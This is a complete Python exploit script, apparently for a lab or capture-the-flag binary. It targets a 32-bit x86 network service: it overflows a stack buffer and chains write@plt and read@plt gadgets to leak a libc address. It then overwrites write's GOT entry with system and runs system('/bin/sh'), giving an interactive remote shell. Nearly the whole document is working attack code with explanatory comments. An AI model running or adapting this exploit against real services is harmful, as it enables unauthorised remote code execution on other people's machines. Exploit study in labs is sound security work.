from socket import *
import struct
import time
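# ret2plt exploit for a 32-bit, non-PIE x86 binary listening on host:port.
#
# Chain: leak write@libc through write@plt, stage "/bin/sh" in .bss with
# read@plt, overwrite write@got with system@libc, then "call write" once more
# (which is now system) with the .bss string as its argument.
#
# All addresses and the libc offset below belong to ONE build of the target
# binary and the libc it runs against; re-derive them (objdump -d / readelf -r
# on the binary, nm -D on the target's libc) before using this anywhere else.


def p(x):
    """Pack *x* as a 32-bit little-endian unsigned int (target is x86)."""
    return struct.pack("<L", x)


def up(x):
    """Unpack a 32-bit little-endian unsigned int from exactly 4 bytes."""
    return struct.unpack("<L", x)[0]


try:  # Python 2 / 3 compatibility: raw_input() became input() in 3.
    _input = raw_input
except NameError:
    _input = input

host = "10.211.55.4"
port = 9999

pop3ret = 0x080484b6    # pop;pop;pop;ret gadget used to discard 3 call arguments
write_plt = 0x0804830C
write_got = 0x08049614
read_plt = 0x0804832C
bss = 0x08049628        # writable scratch area used to stage the command string
cmd = b"/bin/sh"
offset = 633536         # write - system in the target's libc (libc-build specific)
LEAK_LEN = 0xff         # byte count passed to write()/read() in every gadget below


def build_payload():
    """Return the stack overflow payload: 140 bytes of padding plus the ROP chain.

    The chain is entirely PLT/gadget based, so it needs no libc address up
    front; the libc address is only required for the value fed to the third
    read() at run time.
    """
    chain = b"A" * 140  # pad up to the saved return address
    # 1. write(1, write_got, LEAK_LEN): dump the GOT so we learn write@libc.
    chain += p(write_plt) + p(pop3ret) + p(1) + p(write_got) + p(LEAK_LEN)
    # 2. read(0, bss, LEAK_LEN): stage the command string in .bss.
    chain += p(read_plt) + p(pop3ret) + p(0) + p(bss) + p(LEAK_LEN)
    # 3. read(0, write_got, LEAK_LEN): replace write@got with system@libc.
    chain += p(read_plt) + p(pop3ret) + p(0) + p(write_got) + p(LEAK_LEN)
    # 4. write@plt now resolves to system; "AAAA" is the (unused) return
    #    address, bss the first argument -> system("/bin/sh").
    chain += p(write_plt) + b"AAAA" + p(bss)
    return chain


def recv_exact(sock, n):
    """Read exactly *n* bytes from *sock*.

    Raises EOFError if the peer closes the connection first; a plain recv(n)
    may legitimately return fewer bytes, which would break struct.unpack.
    """
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise EOFError("connection closed after %d of %d bytes" % (len(buf), n))
        buf += chunk
    return buf


def main():
    """Run the exploit against host:port and drop into a minimal shell loop."""
    s = socket(AF_INET, SOCK_STREAM)
    s.connect((host, port))
    try:
        s.sendall(build_payload() + b"\n")

        # Stage 1: the leaking write() sends LEAK_LEN bytes. Consume all of
        # them so the surplus does not show up later as bogus shell output.
        leak = recv_exact(s, LEAK_LEN)
        write_libc = up(leak[:4])
        print("[+] write_libc : " + hex(write_libc))
        system_libc = write_libc - offset
        print("[+] system_libc : " + hex(system_libc))

        # Stage 2 + 3: two back-to-back read() calls on the target. They must
        # arrive as separate segments, otherwise the first read() (LEAK_LEN
        # bytes) swallows the GOT value too; the pause is what keeps them
        # apart, so do not remove it.
        s.sendall(cmd + b"\n")
        time.sleep(0.1)
        s.sendall(p(system_libc) + b"\n")

        # Stage 4: system("/bin/sh") is running on the other end. The shell
        # prints no prompt, so bound recv() with a timeout for silent commands.
        s.settimeout(2.0)
        while True:
            line = _input("$ ")
            if line == "exit":
                break
            s.sendall(line.encode() + b"\n")
            try:
                out = s.recv(2048)
            except timeout:
                continue  # command produced no output within the timeout
            if not out:
                print("[-] connection closed by target")
                break
            print(out.decode("utf-8", "replace"))
    finally:
        s.close()


if __name__ == "__main__":
    main()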